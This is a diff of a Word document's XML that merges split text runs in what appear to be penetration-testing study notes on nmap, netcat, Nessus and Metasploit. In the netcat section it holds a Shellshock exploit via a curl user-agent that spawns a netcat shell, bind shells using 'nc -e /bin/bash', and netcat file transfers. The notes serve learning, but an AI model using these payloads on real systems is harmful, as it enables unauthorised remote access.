-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t># ls</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-protocols</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">  : Contain protocol and port related info</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Disable Host Discovery &amp; Port Scan Only:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>`````````````````````````````````````````</w:t>
-      </w:r>
-      <w:r>
-        <w:t>```````````````</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sT</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 172.30.231.207 -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Pn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sT 172.30.231.207 -Pn</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2258,37 +1248,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> target</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sS target</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2334,39 +1299,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>cd /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/share/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/scripts/</w:t>
+        <w:t>cd /usr/share/nmap/scripts/</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2374,37 +1307,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sSV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --script=rdp-vuln-ms12-020 target</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sSV --script=rdp-vuln-ms12-020 target</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -2415,37 +1323,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sSVC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> target</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sSVC target</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -2472,74 +1355,24 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sSV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --script vuln target</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sSV --script vuln target</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sSV</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --script exploit target</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sSV --script exploit target</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2574,15 +1407,7 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cgi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>-bin/status</w:t>
+        <w:t>/cgi-bin/status</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2614,15 +1439,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Syntax: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> [options] host port</w:t>
+        <w:t>Syntax: nc [options] host port</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2650,37 +1467,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>lvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 8080 </w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">nc -lvp 8080 </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2698,21 +1490,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> machine1_IP 8080 -v</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc machine1_IP 8080 -v</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2735,37 +1518,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>lvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 8080 &lt; data.txt</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -lvp 8080 &lt; data.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2783,21 +1541,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 127.0.0.1 8080 -v &gt; send.txt</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc 127.0.0.1 8080 -v &gt; send.txt</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2820,37 +1569,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n -v -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>lp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 5555 -e /bin/bash</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -n -v -lp 5555 -e /bin/bash</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2862,37 +1586,12 @@
       <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nv</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 127.0.0.1 5555</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -nv 127.0.0.1 5555</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2928,70 +1627,22 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">we took access through vulnerable web and start listening  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>there</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> terminal</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>curl -A '() { :; }; echo; /bin/bash -c "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>lp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 65000 -e /bin/bash"' </w:t>
+        <w:t>we took access through vulnerable web and start listening  netcat on there terminal</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">curl -A '() { :; }; echo; /bin/bash -c "nc -lp 65000 -e /bin/bash"' </w:t>
       </w:r>
       <w:hyperlink r:id="rId4" w:history="1">
         <w:r>
@@ -3025,21 +1676,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 192.168.46.234 65000 -v</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc 192.168.46.234 65000 -v</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3116,15 +1758,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Tenable Nessus is a widely used remote security and vulnerability scanning tool used by penetration testers and IT security professionals. It identifies software flaws, missing patches, malware, and misconfigurations across various networks, operating systems, and applications before </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cyberattackers</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> can exploit them.</w:t>
+        <w:t>Tenable Nessus is a widely used remote security and vulnerability scanning tool used by penetration testers and IT security professionals. It identifies software flaws, missing patches, malware, and misconfigurations across various networks, operating systems, and applications before cyberattackers can exploit them.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3144,15 +1778,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Nessus Expert: Designed for modern environments, it adds external attack surface discovery and infrastructure-as-code (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>IaC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) scanning.</w:t>
+        <w:t>Nessus Expert: Designed for modern environments, it adds external attack surface discovery and infrastructure-as-code (IaC) scanning.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3184,92 +1810,25 @@
       <w:r>
         <w:t xml:space="preserve">$ </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>dpkg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Nessus----------.deb</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo dpkg -i Nessus----------.deb</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">$ </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>systemctl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> status </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo systemctl status </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3277,45 +1836,18 @@
         </w:rPr>
         <w:t>Nessus.service</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">$ </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>systemctl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> start </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">sudo systemctl start </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3323,7 +1855,6 @@
         </w:rPr>
         <w:t>Nessus.service</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3388,25 +1919,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, installed on the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>AttackBox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and most commonly used penetration testing Linux distributions.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>: The main command-line interface.</w:t>
+        <w:t>Metasploit Framework: The open-source version that works from the command line. This room will focus on this version, installed on the AttackBox and most commonly used penetration testing Linux distributions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>msfconsole: The main command-line interface.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3451,15 +1969,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> Auxiliary: Any supporting module, such as scanners, crawlers and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>fuzzers</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, can be found here.</w:t>
+        <w:t xml:space="preserve"> Auxiliary: Any supporting module, such as scanners, crawlers and fuzzers, can be found here.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3508,23 +2018,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> No </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>OPeration</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Module: NOPs (No </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>OPeration</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>) do nothing, literally. They are often used as a buffer to achieve consistent payload sizes.</w:t>
+        <w:t xml:space="preserve"> No OPeration Module: NOPs (No OPeration) do nothing, literally. They are often used as a buffer to achieve consistent payload sizes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3552,31 +2046,22 @@
         <w:tab/>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msfdb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msfdb init</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">or </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3584,48 +2069,20 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">or </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msfdb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>reinit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msfdb reinit</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve"> Launch Command: </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -3633,19 +2090,10 @@
         </w:rPr>
         <w:t>msfconsole</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> Once launched, you will see the command line changes to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>&gt;</w:t>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> Once launched, you will see the command line changes to msf&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3748,36 +2196,12 @@
     </w:p>
     <w:p>
       <w:r>
